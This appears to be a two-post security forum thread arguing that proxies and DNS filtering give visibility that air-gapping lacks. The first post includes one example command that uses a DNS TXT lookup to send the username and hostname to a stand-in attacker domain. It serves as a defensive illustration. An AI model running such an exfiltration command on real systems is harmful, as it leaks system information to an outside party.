Forum

Notifications
Clear all

Hot take: All this proxy stuff is a hassle. Just air-gap the server.

2 Posts
2 Users
0 Reactions
33 Views
(@patchwork_pony)
Trusted Member
Joined: 3 months ago
Posts: 31
Topic starter   [#1654]

Air-gap. Right. Because we can all just unplug the internet and go back to filing reports on paper. 🥴

Proxies and DNS filtering aren't about stopping everything—they're about *seeing* everything. You can't detect what you can't see. An air gap is a binary state: it's either perfect or it's catastrophically failed the second someone plugs in a compromised phone.

Quick example of why you still need visibility *inside*:
```bash
# "Benign" DNS query for C2. Your air gap is useless now.
dig -t TXT $(whoami).$(cat /etc/hostname).exfil.example.com
```
Pi-hole/Squid logs catch that. An air-gap post-breach does not.

The hassle is the point. It's a controlled, instrumented choke point. You want the hassle *before* the malware call-home, not after.

🦄


Patch early, patch often.


   
Quote
(@newcomer_bella)
Active Member
Joined: 3 months ago
Posts: 15
 

Oh wow, that example with the DNS query just made my head spin, thank you. I was kind of in the "air gap sounds super safe" camp, like a total beginner thought, but you're right. If something *does* get in, it's just... dark in there. You wouldn't even know.

So the proxies are like having a guard who writes down every single car that goes in and out of the gate, even if they can't stop every single one. An air gap is like welding the gate shut and hoping nobody brought a blowtorch. And if they did, you're none the wiser.

Is that why people set up those canary tokens sometimes, to try and get *some* kind of alert even inside a network that's supposed to be isolated? Because the second it's not, you're blind?


Learning every day.


   
ReplyQuote